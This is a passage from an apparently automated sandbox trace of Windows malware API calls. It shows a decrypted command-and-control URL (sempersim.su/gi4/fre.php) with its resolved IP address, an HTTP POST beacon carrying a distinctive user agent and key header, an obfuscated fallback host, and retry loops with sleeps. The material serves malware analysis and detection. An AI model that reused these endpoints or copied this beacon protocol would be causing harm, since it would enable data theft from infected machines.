pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0249.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.442] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.442] GetProcessHeap () returned 0x5b0000 [0249.443] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0249.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.444] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0249.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.444] CryptDestroyKey (hKey=0x5be288) returned 1 [0249.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0249.445] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0249.445] GetProcessHeap () returned 0x5b0000 [0249.445] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0249.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.446] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0249.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.447] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0249.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.448] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0249.448] GetProcessHeap () returned 0x5b0000 [0249.448] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0249.448] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0249.449] GetProcessHeap () returned 0x5b0000 [0249.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0249.449] socket (af=2, type=1, protocol=6) returned 0x388 [0249.450] connect (s=0x388, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0249.519] FreeAddrInfoW (pAddrInfo=0x5cdea8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0249.519] GetProcessHeap () returned 0x5b0000 [0249.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0249.519] GetProcessHeap () returned 0x5b0000 [0249.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0249.520] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0249.520] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0249.521] GetProcessHeap () returned 0x5b0000 [0249.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0249.521] GetProcessHeap () returned 0x5b0000 [0249.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0249.521] GetProcessHeap () returned 0x5b0000 [0249.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3590 [0249.521] GetProcessHeap () returned 0x5b0000 [0249.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0249.522] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0249.522] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0249.522] GetProcessHeap () returned 0x5b0000 [0249.522] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0249.522] GetProcessHeap () returned 0x5b0000 [0249.523] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0249.523] send (s=0x388, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0249.523] send (s=0x388, buf=0x5d1e18*, len=159, flags=0) returned 159 [0249.524] GetProcessHeap () returned 0x5b0000 [0249.524] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0249.524] recv (in: s=0x388, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0250.685] GetProcessHeap () returned 0x5b0000 [0250.685] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0250.686] GetProcessHeap () returned 0x5b0000 [0250.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0250.686] GetProcessHeap () returned 0x5b0000 [0250.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0250.686] GetProcessHeap () returned 0x5b0000 [0250.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0250.688] closesocket (s=0x388) returned 0 [0250.688] GetProcessHeap () returned 0x5b0000 [0250.688] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0250.688] GetProcessHeap () returned 0x5b0000 [0250.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0250.689] GetProcessHeap () returned 0x5b0000 [0250.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0250.689] GetProcessHeap () returned 0x5b0000 [0250.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0250.690] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb74) returned 0x388 [0250.691] Sleep (dwMilliseconds=0xea60) [0250.720] GetProcessHeap () returned 0x5b0000 [0250.720] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0250.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.721] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0250.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.728] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0250.773] GetProcessHeap () returned 0x5b0000 [0250.773] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0250.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.779] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0250.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.780] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0250.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.781] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.781] GetProcessHeap () returned 0x5b0000 [0250.782] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0250.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.786] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0250.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.787] CryptDestroyKey (hKey=0x5be048) returned 1 [0250.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.788] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0250.788] GetProcessHeap () returned 0x5b0000 [0250.788] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0250.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.789] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.790] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.791] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.791] GetProcessHeap () returned 0x5b0000 [0250.791] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0250.810] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0250.811] GetProcessHeap () returned 0x5b0000 [0250.811] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0250.812] GetProcessHeap () returned 0x5b0000 [0250.812] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0250.812] GetProcessHeap () returned 0x5b0000 [0250.812] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0250.812] GetProcessHeap () returned 0x5b0000 [0250.813] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3080 [0250.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.814] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0250.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.821] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0250.831] GetProcessHeap () returned 0x5b0000 [0250.831] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0250.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.832] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0250.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.833] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0250.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.834] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.834] GetProcessHeap () returned 0x5b0000 [0250.834] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0250.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.835] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3080, pdwDataLen=0xdfcfc | out: pbData=0x5d3080, pdwDataLen=0xdfcfc) returned 1 [0250.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.836] CryptDestroyKey (hKey=0x5be288) returned 1 [0250.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0250.837] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0250.837] GetProcessHeap () returned 0x5b0000 [0250.837] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0250.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.838] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0250.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.839] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0250.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.840] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0250.840] GetProcessHeap () returned 0x5b0000 [0250.840] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0250.841] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0250.846] GetProcessHeap () returned 0x5b0000 [0250.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0250.846] socket (af=2, type=1, protocol=6) returned 0x38c [0250.846] connect (s=0x38c, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0250.914] FreeAddrInfoW (pAddrInfo=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0250.914] GetProcessHeap () returned 0x5b0000 [0250.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0250.914] GetProcessHeap () returned 0x5b0000 [0250.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0250.915] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0250.915] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0250.915] GetProcessHeap () returned 0x5b0000 [0250.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0250.916] GetProcessHeap () returned 0x5b0000 [0250.916] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0250.916] GetProcessHeap () returned 0x5b0000 [0250.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0250.916] GetProcessHeap () returned 0x5b0000 [0250.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0250.917] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0250.918] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0250.918] GetProcessHeap () returned 0x5b0000 [0250.918] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0250.918] GetProcessHeap () returned 0x5b0000 [0250.918] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0250.918] send (s=0x38c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0250.920] send (s=0x38c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0250.920] GetProcessHeap () returned 0x5b0000 [0250.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0250.920] recv (in: s=0x38c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0252.136] GetProcessHeap () returned 0x5b0000 [0252.137] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0252.137] GetProcessHeap () returned 0x5b0000 [0252.137] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0252.137] GetProcessHeap () returned 0x5b0000 [0252.137] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0252.138] GetProcessHeap () returned 0x5b0000 [0252.138] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0252.138] closesocket (s=0x38c) returned 0 [0252.139] GetProcessHeap () returned 0x5b0000 [0252.139] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0252.139] GetProcessHeap () returned 0x5b0000 [0252.139] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0252.140] GetProcessHeap () returned 0x5b0000 [0252.140] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3080 | out: hHeap=0x5b0000) returned 1 [0252.140] GetProcessHeap () returned 0x5b0000 [0252.140] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0252.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xbb4) returned 0x38c [0252.153] Sleep (dwMilliseconds=0xea60) [0252.156] GetProcessHeap () returned 0x5b0000 [0252.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0252.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.157] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0252.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.164] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0252.173] GetProcessHeap () returned 0x5b0000 [0252.173] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0252.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.174] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0252.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.175] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0252.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.176] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.176] GetProcessHeap () returned 0x5b0000 [0252.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0252.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.178] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0252.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.180] CryptDestroyKey (hKey=0x5be288) returned 1 [0252.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.180] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0252.180] GetProcessHeap () returned 0x5b0000 [0252.181] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0252.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.181] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.182] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.183] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.184] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0252.184] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.184] GetProcessHeap () returned 0x5b0000 [0252.184] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0252.184] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0252.185] GetProcessHeap () returned 0x5b0000 [0252.186] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0252.186] GetProcessHeap () returned 0x5b0000 [0252.186] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0252.186] GetProcessHeap () returned 0x5b0000 [0252.187] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0252.193] GetProcessHeap () returned 0x5b0000 [0252.194] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0252.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.195] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0252.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.201] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0252.213] GetProcessHeap () returned 0x5b0000 [0252.213] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0252.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.214] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0252.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.215] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0252.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.216] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.216] GetProcessHeap () returned 0x5b0000 [0252.216] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0252.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.218] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0252.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.222] CryptDestroyKey (hKey=0x5be288) returned 1 [0252.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0252.223] 